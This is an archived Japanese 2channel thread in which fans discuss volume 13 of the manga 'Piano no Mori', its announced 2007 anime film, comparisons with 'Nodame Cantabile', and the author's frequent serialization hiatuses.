162 :名無しんぼ@お腹いっぱい:2006/12/18(月) 10:19:02 ID:IgxixNOr0
12/22

163 :名無しんぼ@お腹いっぱい:2006/12/19(火) 01:25:50 ID:PJME1Ocp0
>162
ありがd。

164 :名無しんぼ@お腹いっぱい:2006/12/19(火) 10:57:23 ID:xcSOnT4o0
どいたしまして。
今回は延期にならないよね。

雨宮、「大した事ない」 ってか、心配です。
1回挫折しちゃったし。
今回負けたらニートかな。
コンサートしなくなって、スタジオに篭っちゃったピアニストいたでしょ。

165 :名無しんぼ@お腹いっぱい:2006/12/19(火) 13:11:34 ID:a8SYCXMc0
連載描かなくなって、スタジオに篭っちゃった漫画家いたでしょw

166 :名無しんぼ@お腹いっぱい:2006/12/19(火) 14:28:40 ID:6rikTlTM0
明らかに編集が柳の下でのだめを探してるようにしか見えない・・・

167 :名無しんぼ@お腹いっぱい:2006/12/19(火) 15:56:13 ID:Gm0TPFEd0
ピアノのだめの後釜扱いかよ


168 :名無しんぼ@お腹いっぱい:2006/12/19(火) 15:58:29 ID:5dYr6B450
後釜どころか今の状況じゃ比べるのもおこがましいって感じだろ。
神童は映画の方が順調みたいだしな。

169 :名無しんぼ@お腹いっぱい:2006/12/19(火) 18:28:28 ID:iKXfsHES0
のだめのフォロワーって・・・
のだめが始まった頃にはすでに単行本で7、8巻当たりのところまで
いってた作品なんだけどな。


170 :名無しんぼ@お腹いっぱい:2006/12/19(火) 23:22:43 ID:H7Sj6xZU0
今日の朝、本屋さんに行ったらピアノの森13巻を探している人がいたよ

171 :名無しんぼ@お腹いっぱい:2006/12/20(水) 00:55:15 ID:tlQTo/7U0
近所の本屋なら明日にでも早売りしてるかも

172 :名無しんぼ@お腹いっぱい:2006/12/21(木) 09:08:17 ID:wm+DFqEJ0
13巻ってまだ発売してないの?
3日くらい前に本屋で普通に買ったけど・・・。

173 :名無しんぼ@お腹いっぱい:2006/12/22(金) 12:22:47 ID:FlGHWo740
買ってきた。まとめ読みするとなかなかいいな。

174 :名無しんぼ@お腹いっぱい:2006/12/22(金) 12:29:23 ID:fgJ8aSuY0
172さん、ラッキーだね。
オイラの近所は、昨晩三軒回ったがなかったよ。
今朝漸くゲト。
また暫く読み直しだ。

175 :名無しんぼ@お腹いっぱい:2006/12/23(土) 12:29:01 ID:sECk3Lhn0
加筆多くない?


176 :名無しんぼ@お腹いっぱい:2006/12/23(土) 12:50:02 ID:AFqJueg9O
阿時野のピアノは温かかったって説明する修平パパの顔が悪役顔に見える

177 :名無しんぼ@お腹いっぱい:2006/12/23(土) 15:00:31 ID:nSz3bFWc0
昨日ゲット
コミックス派としては
なんか話飛んでる気がしてびっくりした

アニメはこれ以上の情報はまだないよね?

178 :名無しんぼ@お腹いっぱい:2006/12/23(土) 19:28:41 ID:hUpmcrKXO
今、13巻読み終わった。
>>177と同じく話がとんでると思ってしまった。さて1巻から読み返すか。

179 :名無しんぼ@お腹いっぱい:2006/12/23(土) 23:51:46 ID:nSz3bFWc0
>>178
だよね〜
さて大人編読み返すか・・

180 :名無しんぼ@お腹いっぱい:2006/12/23(土) 23:59:18 ID:M2blZnLV0
今週モーニング休みだったの?
コンビニはしごしちゃった

181 :名無しんぼ@お腹いっぱい:2006/12/24(日) 01:26:27 ID:nCRPNEdY0
最新刊大幅増ページだな。
コレが原因か連載が滞ったの。

182 :名無しんぼ@お腹いっぱい:2006/12/24(日) 01:41:51 ID:vb/mRpi7O
私も話飛んでるように感じて、一瞬分からなかったよ。
映画の公式サイトはまだTOPだけみたいだね…。
まだ絵を見たことないから、どんな風になってるか、すごく気になる。

183 :名無しんぼ@お腹いっぱい:2006/12/24(日) 11:16:02 ID:Q7WfEn/g0
13巻の最初をパラパラしてみて思ったこと

カイが病院で医者と会っていたシーンって過去にあったっけ?

184 :名無しんぼ@お腹いっぱい:2006/12/24(日) 12:41:41 ID:gsPAatcy0
ないよ
伏線ねーじゃんってこのスレでも散々言われてたような

185 :名無しんぼ@お腹いっぱい:2006/12/24(日) 17:21:25 ID:aKBEO+CY0
誉子がブサイクになってて萎えた

186 :名無しんぼ@お腹いっぱい:2006/12/24(日) 19:14:11 ID:W0D5/Iej0
「ピアノの森」の劇場アニメーション化決定!!

音楽を愛する
全ての人に贈る
感動の物語

ピアノの森
The Perfect World of Kai

制作:NAS アニメーション制作:マッドハウス 製作:「ピアノの森」製作委員会 配給:松竹
原作:一色まこと(講談社 週刊モーニング連載) 監督:小島正幸 「花田少年史」「MONSTER」
脚本:蓬菜竜太 「舞台・世界の中心で、愛をさけぶ」 音楽:篠原敬介(「あらしのよるに」)

2007年7月 夏休み全国超拡大ロードショー

http://www.piano-movie.jp/

【映画】 「ピアノの森」が2007年7月にアニメ映画化 公式サイトがオープン
http://anime.2ch.net/test/read.cgi/news/1166951136/

187 :名無しんぼ@お腹いっぱい:2006/12/24(日) 19:17:05 ID:W0D5/Iej0
ということで、
どこぞの製作関係者だか翻訳家がblogでリークしちゃってから随分と経ったが、
イブの日に正式情報公開。

188 :名無しんぼ@お腹いっぱい:2006/12/24(日) 19:40:48 ID:D2xe/tJR0
【漫画】一色まこと『ピアノの森』 劇場アニメ公式サイトプレオープン【2007年7月公開予定】
http://news19.2ch.net/test/read.cgi/moeplus/1166950796/

189 :名無しんぼ@お腹いっぱい:2006/12/25(月) 22:56:37 ID:8zKidvLD0
地方なので今日買いました。
加筆が思ったより多くて驚いた。

周囲の人々が凄く勧めるので、のだめも買いました。
4巻まで読んで既に嫌になってます。
どこが面白いのかわからない…

190 :名無しんぼ@お腹いっぱい:2006/12/25(月) 23:49:12 ID:j7YyBLc40
のだめ未読なんだけど
ドラマは見た。
そんなにいいかなあ?と思う。

191 :189:2006/12/26(火) 00:11:06 ID:/Jka6Jk/0
6巻まで読みました。ドラマは見てません。
原作の方が面白いと周囲の人々は言います。
読んでいて、え?これってもしかしてギャグ表現なの?と悩んでしまいます。
それ位ギャグがつまんないです。ストーリーもドキドキしません。
ピアノの森ともう一つ、好きな音楽マンガが増えるかな、と思っていたのに。
ただ、演奏シーンの描写はのだめの方がわかりやすいです。
ただ、曲どころか楽譜も読めない人には、ピアノの森式表現で良いかと思います。
その辺りで意見が別れそうですね。
ラフコン2と3はスコアも持ってるし、ほぼ毎日聴いているので、比較しやすかったです。


192 :名無しんぼ@お腹いっぱい:2006/12/26(火) 00:31:21 ID:7oQAlVlK0
比較せんでいいから
そもそものだめは主役が指揮者
全然別ジャンルのマンガである

193 :名無しんぼ@お腹いっぱい:2006/12/26(火) 05:54:03 ID:NVTvqpWP0
ジョジョの方がジャンル近いよな!

194 :名無しんぼ@お腹いっぱい:2006/12/26(火) 06:46:49 ID:9SmZ5svgO
海はありさと阿字野と海へ行っちゃったみたいだけど
レイちゃんが海に行く話とかはこの先やらないのかな?

行った事のない海に憧れてて海って名前つけたみたいだから
そういう話あるのかな?って思った。
まぁなくていい話だろうけどw

195 :名無しんぼ@お腹いっぱい:2006/12/26(火) 07:58:18 ID:N315A3PlO
『ピアノの森』アニメ化か。
『のだめ…』、『神童』…他に音楽物で映像化しそうなのって何かあるかな?


























『音吉君のピアノ物語』?

196 :名無しんぼ@お腹いっぱい:2006/12/26(火) 11:18:37 ID:Sy5SAng+0




























197 :名無しんぼ@お腹いっぱい:2006/12/26(火) 11:52:37 ID:lnkl+FqZ0
この漫画ほんと絵がきれいだよね
ポスターがあればなぁ

198 :名無しんぼ@お腹いっぱい:2006/12/26(火) 12:06:52 ID:lnkl+FqZ0
アニメ化でグッズもでるやろう

199 :名無しんぼ@お腹いっぱい:2006/12/26(火) 16:07:30 ID:XrBS/9pk0
のだめは、国内編は面白かったが海外編はぜんぜん面白くないや・・・

200 :名無しんぼ@お腹いっぱい:2006/12/26(火) 17:45:26 ID:2ELb8t9z0
スレ違い

201 :名無しんぼ@お腹いっぱい:2006/12/26(火) 20:59:43 ID:7oQAlVlK0
>>199
それはピアノの森も同じではないか

202 :名無しんぼ@お腹いっぱい:2006/12/26(火) 21:13:46 ID:AW0ioSRB0
音楽ものはどうもあまり話を拡げ過ぎると微妙になりやすい傾向があるな

203 :名無しんぼ@お腹いっぱい:2006/12/26(火) 21:52:56 ID:gwcGwmzX0
1〜7くらいにグングンひきつけられたが 
どうもこの頃のは・・・最後まで発売してみないとどうなるか分からないな・・・
今、モーニングではどれくらいの頻度で連載してるの? 休載からの復帰後は定期的な連載再開になるのかな

絵が綺麗というよりも作り方がうまいというべきだな
視覚から音がイメージできるような描写とか ストーリーとして動いてる漫画だからこそ

204 :名無しんぼ@お腹いっぱい:2006/12/27(水) 00:55:29 ID:PWtnBMr00
すでにもうどうでもいい漫画になりつつある

205 :名無しんぼ@お腹いっぱい:2006/12/27(水) 09:49:18 ID:4QO3W13W0
とりあえず、のだめと同じようにCD出してくれ
演奏者はこだわらないから

206 :名無しんぼ@お腹いっぱい:2006/12/27(水) 09:52:53 ID:/hMA/O0t0
CDを出すのなら、一つの曲を違う演奏者でニュアンスを違えて
聞いて見たいね、雨宮父いやし風、パンウエイ強い情念風、とか
教科書通り優等生雨宮息子風とかね。当然、解説は加賀先生ね。

207 :名無しんぼ@お腹いっぱい:2006/12/27(水) 11:20:57 ID:MOMlOxUM0
こっちはファンタジー色が強いからなー

映画公開後、にわか音楽マニアが
「ありえねぇ」
とギャーギャー騒ぐのが目に見えてる。

花田少年史みて
「幽霊なんかいねーバロス」
と騒ぐみたいなものなんだが・・・


208 :名無しんぼ@お腹いっぱい:2006/12/27(水) 12:41:16 ID:VY/C2em40
>>205
アシュケナージが監督してCD作るとか聞いたけど

209 :名無しんぼ@お腹いっぱい:2006/12/27(水) 17:15:14 ID:uqN5pJVv0
一色さんは恵まれない境遇、環境に居る人々や
それでもその中でキラリと光るぜ?みたいな話は抜群にうまい。
今の話は既に主人公が恵まれすぎちゃって...

210 :名無しんぼ@お腹いっぱい:2006/12/27(水) 18:27:37 ID:6vsVN87A0
確かに弱点がないな・・
雨宮とか便所姫のほうが感情移入できそう・・

211 :名無しんぼ@お腹いっぱい:2006/12/27(水) 19:20:24 ID:yP3dev0O0
そうはいってもカイの今があるのって天性のものもあるけど
それ以上に努力の賜物って面も描かれてるはず
8巻の後半で雨宮がカイの住んでるところに初めていった回で
雨宮が何も知らないで、カイくんいいよなぁ気楽で、みたいな能天気な事言ってたけど
翌日本当はカイはすごく練習しててそれに部屋中に勉強のあとがあったのみて
自分を恥ずかしくおもってた、古い話だけどこういうのの積み重ねで今のカイあるって
おもってたんやけど、違うのかな

212 :名無しんぼ@お腹いっぱい:2006/12/28(木) 02:07:11 ID:PDlX/RswO
今週モーニングちゃんと載ってるのかな?

213 :名無しんぼ@お腹いっぱい:2006/12/28(木) 10:00:56 ID:jyS6HTkc0
載ってたけど、また年明けから2回続けて休載。

214 :名無しんぼ@お腹いっぱい:2006/12/28(木) 19:09:15 ID:Za+RLDb7O
白々しいくらいなまでのミスリード

215 :名無しんぼ@お腹いっぱい:2006/12/28(木) 21:08:51 ID:PDlX/RswO
素敵なパン様が見れたから良しとします

216 :名無しんぼ@お腹いっぱい:2006/12/28(木) 23:08:22 ID:QnW/C99jP
阿字野の死亡フラグは無しだったか

217 :名無しんぼ@お腹いっぱい:2006/12/28(木) 23:54:45 ID:cxRACn240
>>181
>>182
>>183
>>184
>>189

ちゃんとモーニング買えよ。ヴォケが。

218 :名無しんぼ@お腹いっぱい:2006/12/29(金) 06:38:09 ID:0bVYHWMo0
>>216
空港の売店で札束つかって買い物してればなぁw

219 :名無しんぼ@お腹いっぱい:2006/12/29(金) 08:42:34 ID:e+0J7RYC0
13巻発売に合わせた顔見世興行だったな。
1mmも話が進んでねえw

220 :名無しんぼ@お腹いっぱい:2006/12/29(金) 09:01:52 ID:6N98M5lX0
また一月もおあずけかよ・・・

>>217
買う価値ない

221 :名無しんぼ@お腹いっぱい:2006/12/30(土) 12:41:14 ID:3OV2pmPq0
次の掲載は夏ごろだろうな

222 :名無しんぼ@お腹いっぱい:2006/12/31(日) 23:56:07 ID:FkCjzSe40
今年最後の書き込みが俺だったらこのマンガ来年の3月に終る!!

223 :名無しんぼ@お腹いっぱい:2007/01/01(月) 00:02:12 ID:VJ5632QK0
一年ほど前からモーニングで連載されていたのが気になって
11巻ほど纏めて一気読み

確かに面白いけど、これからの話を作るのは大変そう
少年期の逆境から一転、恵まれすぎてるせいなのか?
序盤は、ピアノ以外の要素、主人公の環境の話なんかが結構グッときましたけど
今や好きなだけピアノを弾ける環境だから
主人公もそれに満足していそうだし
そういう意味で皆を引き付ける新たな要素見つけるは大変そうですね。

とりとめない感想スマソ



224 :名無しんぼ@お腹いっぱい:2007/01/01(月) 00:34:23 ID:Ts89s3PG0
>>223
そうですね
恵まれてる環境
パンウェイが会いたいアジノ先生。ジャン。
カイが漫画の世界では、一番、特別な地位ですよね

チーム一ノ瀬が解散するとか、その約束も後付けポイし
なんか、初期のような勢いで作品作ってほしいな。

お金儲けのために、連載休止するのなら、半年休止しますとかいってほしいし
もう、ストーリーがどうなるかは、わかるし、むだなことで時間稼ぎして
作品のクオリティーを下げないでほしい。

225 :名無しんぼ@お腹いっぱい:2007/01/01(月) 07:43:13 ID:VNH6g85iO
海が恵まれ過ぎているからなのか
上で誰か言ってるように、第3者の視点から主役を見つめるストーリーの方が面白いかも・・・


226 : 【556円】 【豚】 :2007/01/01(月) 11:32:14 ID:VqfceXU+O
月末までおあずけか…

227 :名無しんぼ@お腹いっぱい:2007/01/05(金) 00:50:54 ID:CV6VpXFTO
下がりすぎ

228 :名無しんぼ@お腹いっぱい:2007/01/05(金) 15:59:01 ID:CSjW/Rox0
冴ちゃんって必要か?

229 :名無しんぼ@お腹いっぱい:2007/01/05(金) 17:01:44 ID:TNSqb+gV0
誰だっけw

230 :名無しんぼ@お腹いっぱい:2007/01/05(金) 17:44:31 ID:96H8ILvn0
>>228
便所姫の初恋を実らせない為には必要だろ。

231 :名無しんぼ@お腹いっぱい:2007/01/05(金) 19:33:22 ID:4FCPmCR70
キャスティングはアフレコよりもピアノの代弾きの方が気になるんだ
ろうな。やっぱ世界的なピアニストじゃないと観客(特に音楽ファン)
が納得しないだろう。

232 :名無しんぼ@お腹いっぱい:2007/01/06(土) 08:50:53 ID:M8PvkYo10
>>229
冴ちゃんより、便所姫とくっついた方が話的には盛り上がると思うんだけどナー
一方は小学生以来、ひたすら海を思い続けてピアノを弾きまくり
もう一方は女装した海に惚れて、酔った勢いで云々・・・・だからな
13巻見た限り、便所姫は海ではなくそのピアノに惚れてることになってるから、それでも良いのかもしれないが

>>228
便所姫との再会がもっと早ければ、冴ちゃんは登場しなかったかも・・・と思う。
作者も冴ちゃんとくっついた後、あんなに便所姫と盛り上がることになるのは計算外だったかもしれない。
まーピアノ漫画だから、あんまりその辺は拘ってないのかもね。


233 :名無しんぼ@お腹いっぱい:2007/01/06(土) 09:35:07 ID:A4/b7nc80
てかさ、もともとカイのピアノは唯一無二の天才的なもの。
その天才に努力家の秀才がどう立ち向かうか?
また天才的であるが故に認められないカイのピアノを、どう世に送り出すか?

みたいな話だったのに今やドラゴンボール状態。
風呂敷の広げる方向を間違っちゃって畳めなくなったんじゃないの?

234 :名無しんぼ@お腹いっぱい:2007/01/06(土) 09:39:17 ID:N3CS10y/0
便所姫とはくっつかないからこそいいと思うんだが…

235 :名無しんぼ@お腹いっぱい:2007/01/06(土) 09:57:21 ID:U0x3hhzR0
やっぱりのだめ好きな人間はピアノの森はだめだね。
リアルな音楽の世界の下支えがないもの。

ピアノのタッチが似てるってどういうことか作者が本当に理解しているのか?

それにいくらストーリに関係ないからってオーケストラのシーンの擬音が
「パパパパ」「タタタタ」「バーン」は無いだろうw


236 :名無しんぼ@お腹いっぱい:2007/01/06(土) 10:20:35 ID:17rYGp13O
カイを世に送り出すとか、その辺の初期の話の段階は過ぎてるよ
今は次にどの方向に向くか模索してる段階かねぇ

それが師匠の過去話になるかもしれんが

>>232
まあ一夜でくっつくより、昔から恋焦がれる方とくっつく方が話は盛り上がるわな
リアルじゃ、前者の方が圧倒的に多いが

237 :名無しんぼ@お腹いっぱい:2007/01/06(土) 10:30:20 ID:BYUPH3Ux0
ベジータポジションのパンウェイはこの作品に不要だった気がする。

238 :名無しんぼ@お腹いっぱい:2007/01/06(土) 10:39:27 ID:8s440TcI0
>>235
「ドゴーン」「チャーン」

大して変わらんとおもうが。

239 :名無しんぼ@お腹いっぱい:2007/01/06(土) 11:02:37 ID:A4/b7nc80
>>236
あれで世に送り出された状態なのか?
まだショパコンではギリギリ予選通過、天才の片鱗も見せてない状態なのに。

240 :名無しんぼ@お腹いっぱい:2007/01/06(土) 11:19:33 ID:y2JfakIQ0
16歳でN響ソリスト→ショパコン入賞て感じで中村紘子のような道を歩むのかな海。

本屋で担当編集の言葉が貼ってあった。
2000年と2005年に行われたショパコンの作者取材に2回同行したらしい。
このままのペースだと2010年も取材に行けそう。

241 :名無しんぼ@お腹いっぱい:2007/01/06(土) 12:40:58 ID:F5Plw/tIO
認めたくはないが冴えちゃんというキャラが登場した頃から面白くなくなった
いきなり現れてカイとくっついても読者は「あんた誰?」状態で気持ちが付いてけない
今までを知ってる便所姫の方に気持ちが入り込むのが普通だ
13巻読んだが冴えちゃんはカイの手の事を置いてる本から知ったみたいだよね
便所姫は一目会っただけで見抜いた
それくらいカイの事よくわかってるのに

242 :名無しんぼ@お腹いっぱい:2007/01/06(土) 13:10:13 ID:5jQNlN3oO
えーっと…
いつの間に『カイは手を負傷してる』ことに?
あれは、アジノ復活への伏線ちゃうのん?

243 :名無しんぼ@お腹いっぱい:2007/01/06(土) 13:59:40 ID:17rYGp13O
>>241
ちとPクラの話の期間が長すぎたな
雨宮と再開→バイト辞める→便所姫のエピソード交えつつ九州ピアノコンクール→ショパンコンクール
で良かったような・・・

カイのチェリー卒の話は、あれはあれで面白いけど

244 :名無しんぼ@お腹いっぱい:2007/01/06(土) 21:47:27 ID:D+oTItOx0
13巻読んだ。
もしパンウェイのところで雨宮登場だったら、
・革命、3度のエチュード…キンピラ達にいじめられる小学生時代の回想
  審査員「…まさにポーランド人の心そのものだ」と驚嘆
・バルカロール…日本に帰国してピークラでカイと出会う場面の回想
てな感じになるのだろうか。


245 :名無しんぼ@お腹いっぱい:2007/01/07(日) 00:54:43 ID:QdsYNxGm0
      ______     
      \|        (___
    ♪   |\            `ヽ      |;;;;::iii|   |;;;;::iii|
         |  \             \    |;;;;::iii|   |;;;;::iii|
    ∧∧ |   \             〉 .ヾ!;;;::iii|//" |;;;;::iii|/゙
.    (,,・∀・)| ♪   \          /   .|;;;;::iii|/゙  |;;;;::iii|
   / つ| ̄ ̄ ̄ ̄ ̄ ̄! ̄ ̄ ̄ ̄ ̄ ̄ノ   |;;;;::iii|   |;;;;::iii|
  ( 匚______ζ--ー―ーrー´wwwjjrjww!;;;;::iii|jwjjrjww
  〓〓UU ‖    ||       .||  wjwjjrj jww wj rj从jrwjw
 ‖    ‖. ‖)   ◎      .||j从jwwjw j从jwwjwjjrj从jw
j从jwwjwjjr ◎j从jwwjw jrj从jw .◎ j从jw wjwj jrj w jwjjrj
j从j wjwjjrj jwwjwjjr 从jww wjjrj从jww

>>243
当時は、休載とか・・・・色々あったんだよ。

246 :名無しんぼ@お腹いっぱい:2007/01/08(月) 00:22:17 ID:urjRrdUvO
13巻読んだけど、アジノ死ぬのかな?
また会えるとか、次〜とか。
でも医者の話しはアジノ復活の伏線だろうし…
パンウェイは放火で人殺し?or大切な人が自殺?
ソフィとドレス屋も何かあるのか…?
木霊って何だよ…
謎が多いなぁ〜まぁ最後まで描いてくれればいんだけど。

247 :名無しんぼ@お腹いっぱい:2007/01/08(月) 11:06:12 ID:woN3FAwg0
バンウェイって金竜飛へのオマージュだよね。

248 :名無しんぼ@お腹いっぱい:2007/01/09(火) 23:52:01 ID:BurAvFXwO
久しぶりにこれ読み返してみたけど、通して読むと雨宮が本当むかついてくるわ。
調子に乗る→失敗→周りに当たる→逃げないよ→・・・

全然成長してないじゃん。

249 :名無しんぼ@お腹いっぱい:2007/01/10(水) 22:21:50 ID:MQAKd2Sx0
パンウェイ隠し子なのかと思ったわ。

しかし上でも出てるけど自分もやっぱり冴えちゃんという存在があんまり受け入れられない。
タイムリーなんだから森の端のことも突っ込んでやってみても面白いだろうけどな,番外編でもいいから。
全然ピアノ関係なくなっちゃうけど。

250 :名無しんぼ@お腹いっぱい:2007/01/10(水) 23:58:04 ID:TrncaXd10
冴ちゃんは本題であるピアノの話になると出てこれないのがヒロインとして致命的

251 :名無しんぼ@お腹いっぱい:2007/01/11(木) 02:30:48 ID:/LcJ5XWvO
登場した時は無理矢理なキャラねじこんできたなぁ…と思った
そして冴えちゃんのファッションセンスにも萎えた
カイが今まで着てたものとは正反対な感じのギザギザに切れてるトレーナー
13巻で冴えちゃんも同じの着てるのを見て愕然とした
ペアなのかよ…あのセンスはヤバい
どう見てもDQNファッションです
本当にありがとうございました

252 :名無しんぼ@お腹いっぱい:2007/01/11(木) 09:18:32 ID:TeqFCZSt0
ちゃんと2週で復活しろよ。
ショパコン進めやがれ。

253 :名無しんぼ@お腹いっぱい:2007/01/12(金) 00:27:09 ID:LajBIsuy0
>>251
ぺアっつーか共用してんじゃね?恋人感を出してるんじゃないかと

254 :名無しんぼ@お腹いっぱい:2007/01/17(水) 09:18:59 ID:K+8CZw7w0
2着あるじゃん
俺も最初はシェアしてるんだと思ってたけど。

255 :名無しんぼ@お腹いっぱい:2007/01/18(木) 18:12:03 ID:7MVUXZ2uO
あの服キモイ

256 :名無しんぼ@お腹いっぱい:2007/01/19(金) 15:37:18 ID:kgovZIsX0
来週連載

257 :名無しんぼ@お腹いっぱい :2007/01/19(金) 15:46:02 ID:GFdiRfzJ0
>>256
これ連載って言うのか?

たまーに載るのって、
もう連作読み切りゲストっていう扱いでいいんじゃ……

258 :名無しんぼ@お腹いっぱい:2007/01/19(金) 20:18:51 ID:uPF3nj+/0
モーニングにはよくあること。

つうか、昔の充実していた頃のモーニングはフルで連載してる作品よりも
1シリーズまとめて10週連載、半年休んでまた10週連載みたいな作品が
多くて、それが面白かったのにな。


259 :名無しんぼ@お腹いっぱい:2007/01/19(金) 20:29:56 ID:l17dqz8e0
俺は面白いとは思えないな
イライラしてしまう。

260 :名無しんぼ@お腹いっぱい:2007/01/20(土) 09:21:17 ID:vjmM8UII0
ちょっと言葉足らずだったな。
そのシステム自体が面白いんじゃなくて
そのシステムで発表されていた作品が面白かった。

最近のだとオフィス北極星とかプラネテスとか
U-31とか週刊石川雅之とかあそこらへんが好きだったな。

261 :名無しんぼ@お腹いっぱい:2007/01/20(土) 10:02:01 ID:xa28jmqd0
はじめからシリーズ連載ならわかるんだけど、週刊でやってて突然休載して再開未定なんてことになるから困る

262 :名無しんぼ@お腹いっぱい:2007/01/20(土) 11:53:13 ID:snRZ1NYu0
じゃあ掲載に訂正
でも突然復活して表紙はれるんだからすごいといえばすごいよね
モーニングのホームページには不定期連載 定期連載のどちらにも
ピアノの森載ってないけど

263 :名無しんぼ@お腹いっぱい:2007/01/21(日) 15:53:30 ID:v3U+uL6n0
>>261
モーニングに来てから、突然休載ってのはなかったと思ったが。
一応休載の時はアナウンスするよね。
再開に関しても、殆どアナウンスどおりに再開してるし。
このぐらいのペースがあってるんじゃないのかね。
どうも必要以上に完全主義者みたいだし。
無理させると、今以上の不定期掲載になるし。
スピリッツの頃に前科があるかしな。

264 :名無しんぼ@お腹いっぱい:2007/01/21(日) 16:35:34 ID:l8lr/TNi0
> モーニングに来てから、突然休載ってのはなかったと思ったが。

ついこの間まで、
「次号予告に名前はあるが実際は目次の下にお詫びばかりが掲載されていた状態」
が続きまくっていたわけだが。

265 :名無しんぼ@お腹いっぱい:2007/01/21(日) 17:06:36 ID:v3U+uL6n0
>>264
そうだったっけ?
まぁ、基本載ってない、載ってればもうけものぐらいに考えておけば良いんじゃないの?
アッパーズのころから読んでる俺としては、それほど待たずに再開してるとしか思えないんだが。

266 :名無しんぼ@お腹いっぱい:2007/01/22(月) 09:40:28 ID:b9eygZGJ0
うぜぇよ
ちゃんと連載できてないのは間違いないんだからわけわからん擁護するな

267 :名無しんぼ@お腹いっぱい:2007/01/23(火) 09:45:52 ID:7P+D/ksT0
まあ今の状況を支持できるのは、信者と言われてもしょうがねーだろ。

268 :名無しんぼ@お腹いっぱい:2007/01/23(火) 22:13:41 ID:nmzK39VU0
なんつーか信者はこの作者を課題評価しすぎの気がする。
泣かせるのは上手な気がするけど、花田にしろピアノにしろ
なんかオーソドックスなエピソードばかりで意外な展開っていうのが少ない人のようだ。
プラス、ベタベタの展開やセリフもあって、ちょっと気恥ずかしくなってしまうくらいw
なんか映画やアニメになってもイマイチぱっとしないのがわかるような気がする。


269 :名無しんぼ@お腹いっぱい:2007/01/23(火) 22:23:32 ID:var0Vi0k0
>>266-267
信者でも何でも良いんだけどさ、
昔から一色まことはこんなペースでしか連載できない漫画家だからさ。
出直しといで、ハッスルのころからこんな感じさ。
一年以上、目次ページで「ピアノの森は休載させていただきます」って文章毎号読んで来た者としては、
今の状況なんて別に何とも思わんのだが。
つうか、基本的に載ってない事が常態だと思ってるってだけだ。


270 :名無しんぼ@お腹いっぱい:2007/01/23(火) 22:32:09 ID:var0Vi0k0
だから、何で定期的に載ってない事に今更憤ってるのか分からんわ。

なんちゅうか、ここ最近の連載中断って、
自分の漫画の映画化、アニメ化と重なってるから嫌な予感がするんだよね。
アッパーズに連載中に二度大きな中断があったんだが、
一度目は花田少年史実写映画化(後に制作サイドと一色まことが何か揉めてクランクイン直前に政策中止になった)
二度目は花田アニメ化の時。一年以上休載で雑誌が休刊に。
去年の半年以上の中断は花田実写映画公開。
今年はピアノの森がアニメ映画になるんだよね。
また、一年近く中断するかもよ。

271 :名無しんぼ@お腹いっぱい:2007/01/24(水) 08:39:37 ID:3vvBkk0J0
>>ID:var0Vi0k0
いや、だから信者の感想なんて、何の参考にもできないから必要ないって。
昔から読んでます〜って自慢したいのか?w

別にオレもスピ連載時から読んでるけど、今の状況が普通とも許せるとも
思わねーな。
これはモーニングにも責任はあるだろうけど、休載するならするでハッキリ
しやがれってところで、読者はイライラしてるんだと思う。

272 :名無しんぼ@お腹いっぱい:2007/01/24(水) 09:24:23 ID:DKmViN8e0
許せる?     は?    何様?



273 :名無しんぼ@お腹いっぱい:2007/01/24(水) 09:51:07 ID:3vvBkk0J0
読者ですが何か?

274 :名無しんぼ@お腹いっぱい:2007/01/24(水) 10:11:43 ID:XxSU3mkvO
メディア展開するたびに休載してしまうのがワカラン
普通嬉しくて描くモチベーションが高まらない?
毎回下絵みたいなの載せてたのがアニメ化をきっかけにちゃんと描くようになった人を知ってる
多分アニメ化で広く読まれるから恥ずかしいと思ったんだろう
それとも一色まことは自分の作品が疎かになるほど製作に関わってんのか?

275 :名無しんぼ@お腹いっぱい:2007/01/24(水) 14:32:51 ID:DKmViN8e0
>>273

・一色に「毎週描くから読んでくれ」と頼まれていた
・モーニングに「毎週載せるから買ってくれ」と頼まれていた
・本屋に「買わない人には一色が載ってるか確認もさせない」と言われ仕方なく買った

うん、それならしょうがないな。
君の許せない気持ちももっともだよな。

276 :名無しんぼ@お腹いっぱい:2007/01/24(水) 15:15:06 ID:3vvBkk0J0
>>275
だろ?オマエからも言ってやってくれよ。

277 :名無しんぼ@お腹いっぱい:2007/01/24(水) 18:57:09 ID:ainUvtsX0
>>271
休載するときはきっちりアナウンスしてるし、
再開時期も一応アナウンスしてる。
前回の半年以上の休載はどうだったか記憶にないが、
今の状況の何処に問題があるのか理解できない。
休載に怒るほど俺が入れ込んでないってだけかもしれないが。

278 :名無しんぼ@お腹いっぱい:2007/01/25(木) 00:04:26 ID:m/TVMq2rO
さあて今週から再開予定でしたがどうでしょう。
今からコンビニ行って参ります。

279 :名無しんぼ@お腹いっぱい:2007/01/25(木) 00:08:46 ID:p1qPXPUU0
>>278
報告待ってる
ノシ

280 :名無しんぼ@お腹いっぱい:2007/01/25(木) 00:19:44 ID:EAB11MIhO
載ってたよ!載ってたよ!載ってたよ!

57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)